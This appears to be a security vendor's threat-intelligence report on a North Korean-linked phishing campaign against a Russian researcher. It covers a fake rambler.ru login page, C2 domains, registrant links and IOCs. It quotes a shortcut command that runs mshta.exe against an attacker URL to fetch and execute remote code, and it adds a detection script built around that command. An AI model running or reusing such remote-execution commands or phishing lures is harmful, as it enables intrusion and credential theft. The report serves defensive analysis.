apt37

Thallium cyber attack against a Russian researcher working on the North Korean economy

Introduction

In the course of monitoring the threat activity of the Thallium group, known to be affiliated with the North Korean authorities, ESRC identified an attempted email account hijacking attack against a senior researcher at the Center for Korean Studies of the Institute of Far Eastern Studies, Russian Academy of Sciences, in Moscow.

The threat actor created a short URL using a 'Short URL generator' service; the actual destination address used in the attack was determined to be the following.

● dnsservice.esy[.]es/session-error-active/rambler.ru/config/?id=ludmila_hph&ath=kpp.pdf (93.188.160.77)


[Figure 1] Phishing link creation through shortened URL service

The short URL "surl[.]me/zsu7" appears to have been used as the link in the email; when the recipient clicks it, a login screen impersonating the Russian rambler.ru service is displayed.


[Figure 2] Russian rambler.ru email impersonation login screen

The elaborately crafted fake login screen is pre-filled with the e-mail address '[email protected]', and a search shows that it belongs to a real person.

The account holder is a senior researcher at the Center for Korean Studies of the Institute of Far Eastern Studies, Russian Academy of Sciences, in Moscow. The main research areas are North Korea's economy, North Korea's foreign economic relations, inter-Korean economic relations, and Russia's economic relations with North and South Korea.

Liudmila Zakharova (Institute of Far Eastern Studies, Russian Academy of Sciences)


[Figure 3] Part of 'ideas.repec.org/a/kap/asiaeu/v18y2020i3d10.1007_s10308-019-00544-4.html'

Returning to the attack flow: if the recipient is deceived by the fake login screen and enters the real password, that password is sent to the attacker's server, and the following benign PDF document is then displayed so that the victim does not notice anything unusual.

● dnsservice.esy[.]es/session-error-active/rambler.ru/content/kpp.pdf (93.188.160.77)


[Figure 4] Benign Russian-language PDF document

Running the Russian content of the PDF document through Google Translate gives the following; it concerns a crisis in Korea.


[Figure 5] Google translation of the benign PDF document's Russian text

ESRC researchers identified several interesting points while investigating the attack. Although the threat actor used a Russian IP address (94.242.58.64), the address range matched the VPN service (Hide All IP) that the Thallium group has used in the past.

The web browser was likewise the one the Thallium group frequently uses.


[Figure 6] Threat actor activity log screen

The 'dnsservice.esy[.]es' address used in this activity has appeared in several APT attacks in the past.

– dnsservice.esy[.]es/software1/down.php?file=xsrv

– dnsservice.esy[.]es/www.zip


[Figure 7] Inside xsrv.zip compressed file and batch file command

All of these malicious files appeared in a 2019 attack against a specific individual in Korea that abused a Korean portal email service. At that time, the email was made to look as if a document 'application form.pdf' was attached, and clicking the link downloaded the 'application form.zip' file.

● upsrv.16mb[.]com/fie/down.php?file=Application form.zip (93.188.160.77)


[Figure 8] Malicious email and downloaded compressed file screen

The application form archive contains a shortcut file 'Application form.lnk' whose target path is configured to run the following command, through which it communicates with the 'dnsservice.esy[.]es' server.

%windir%\system32\mshta.exe http://dnsservice.esy[.]es/upda.php

This shows that the 'upsrv.16mb[.]com' link is connected to the 'dnsservice.esy[.]es' address. The 'upda.php' command opens the 'dnsservice.esy[.]es/document/11.pdf' file, then retrieves and executes the 'www.zip' file.


[Figure 9] Shortcut file setting screen
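As an added example (not code from the original report), the following Python snippet shows the detection logic a defender could run over process-creation telemetry to catch the shortcut behaviour described above: mshta.exe launched with a remote URL as its argument. The key=value log format and the sample events are constructed for this illustration; only the URL is the one quoted in the report.

```python
import re
from typing import Dict, List, Optional

# Constructed sample process-creation events (Sysmon EventID 1 style,
# flattened to key=value pairs separated by '|'). Not real telemetry.
SAMPLE_EVENTS = [
    "Image=C:\\Windows\\System32\\mshta.exe|ParentImage=C:\\Windows\\explorer.exe|"
    "CommandLine=\"C:\\Windows\\system32\\mshta.exe\" http://dnsservice.esy.es/upda.php",
    "Image=C:\\Windows\\System32\\mshta.exe|ParentImage=C:\\Windows\\explorer.exe|"
    "CommandLine=mshta.exe C:\\Users\\user\\AppData\\Local\\Temp\\setup.hta",
    "Image=C:\\Program Files\\App\\app.exe|ParentImage=C:\\Windows\\explorer.exe|"
    "CommandLine=app.exe --update",
]

# A remote HTA is fetched when mshta.exe is handed a URL instead of a local path.
REMOTE_URL = re.compile(r"\b(?:https?|ftp)://\S+", re.IGNORECASE)


def parse_event(line: str) -> Dict[str, str]:
    """Split a 'k=v|k=v' line into a dict; values may themselves contain '='."""
    return dict(field.split("=", 1) for field in line.split("|"))


def remote_mshta_url(event: Dict[str, str]) -> Optional[str]:
    """Return the remote URL if this event is mshta.exe loading a remote HTA."""
    image = event.get("Image", "").lower()
    if not image.endswith("\\mshta.exe"):
        return None
    match = REMOTE_URL.search(event.get("CommandLine", ""))
    return match.group(0) if match else None


def scan(lines: List[str]) -> List[Dict[str, str]]:
    """Flag every event where mshta.exe is launched with a remote URL."""
    hits = []
    for line in lines:
        event = parse_event(line)
        url = remote_mshta_url(event)
        if url:
            parent = event.get("ParentImage", "")
            # explorer.exe as parent is consistent with a user double-clicking a .lnk
            hits.append({"url": url, "parent": parent,
                         "user_launched": parent.lower().endswith("\\explorer.exe")})
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        print(hit)
```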

The 'upsrv.16mb[.]com' address also has a history of use in various incidents; a typical case is 'DPRK Human Rights.zip', which targeted a specific person working in media coverage of North Korea. The 'upgradesrv.890m[.]com' address has been used in similar attacks.

● upsrv.16mb[.]com/dta/down.php?file=DPRK Human Rights.zip

● upgradesrv.890m[.]com/data/down.php?file=Kim, Putin have high hopes for their 1st one-on-one meeting.exe

● upgradesrv.890m[.]com/back/2019/index.php=MOU – Contribution Agreement with Ministry of Unification.exe

In 2019, various bait files were registered on the 'dnsservice.esy[.]es' server, mainly documents concerning North and South Korea; some of the files were replaced later.


[Figure 10] Various bait files registered on the attacker's server

The typical addresses used as command and control (C2) servers are listed below; all of them resolve to the same IP address.

Domain address           IP address
dnsservice.esy[.]es      93.188.160.77
upsrv.16mb[.]com         93.188.160.77
upgradesrv.890m[.]com    93.188.160.77
documentserver[.]site    93.188.160.77

What is interesting here is a malicious MS Word DOC file associated with the 'documentserver[.]site' address. This malicious file, discovered in December 2020, contains content written in Indonesian, and it creates and calls a VBS file.


[Figure 11] Inside screen of VBS file created from malicious DOC document

The command in the VBS script communicates with the 'documentserver[.]site' server. The 'op=5' parameter pattern used here resembles the Thallium group's Smoke Screen campaign.

The creator name of this malicious DOC document is the 'Mickey' account, and another DOC document created at the same time under the same creator name was found to be a test file using the North Korean font 'KP CheongPong'.


[Figure 12] Document using the North Korean font KP CheongPong

Threat actors commonly create test documents before producing the malicious documents themselves.


In addition, ESRC researchers looked into the registrant of the 'documentserver[.]site' domain and were able to establish its relationship to other similar attacks.

The domain was registered on March 30, 2020, under the registrant name 'aoler jack', and the email used for registration was the Russian address '[email protected]'.

The registered phone number is +82.12035386476; the +82 international country code denotes Korea.


[Figure 13] 'documentserver[.]site' domain registration information

Similarities were found across a number of domains registered by the attacker, and in 2020 a history of use was confirmed in which the domains were disguised as those of a domestic N portal company. This group is also characterised by long-standing, active use of overseas web hosting services.

Of course, there are also cases where domestic and foreign web servers are hacked, or free/paid server hosting services are signed up for, to use as servers.

Domain Name          Creation Date   Email              Registrar                 IP
emailnaver[.]com     2020-10-09      [email protected]  publicdomainregistry.com  93.188.160.77
nicnaver[.]com       2020-08-14      [email protected]  publicdomainregistry.com  93.188.160.77
mysoftazure[.]com    2019-10-11      [email protected]  hostinger.com             93.188.160.77
proattachfile[.]com  2019-04-22      [email protected]  hostinger.com             93.188.160.77
softfilemanage[.]com 2018-03-27      [email protected]  hostinger.com             31.170.161.28

ESTsecurity's ESRC has confirmed that the Thallium group's threat activity is continuing, and that the group is conducting hacking attacks against Russia as well as Korea and the United States.

IOCs

93.188.160.77
dnsservice.esy[.]es
documentserver[.]site
upgradesrv.890m[.]com
upsrv.16mb[.]com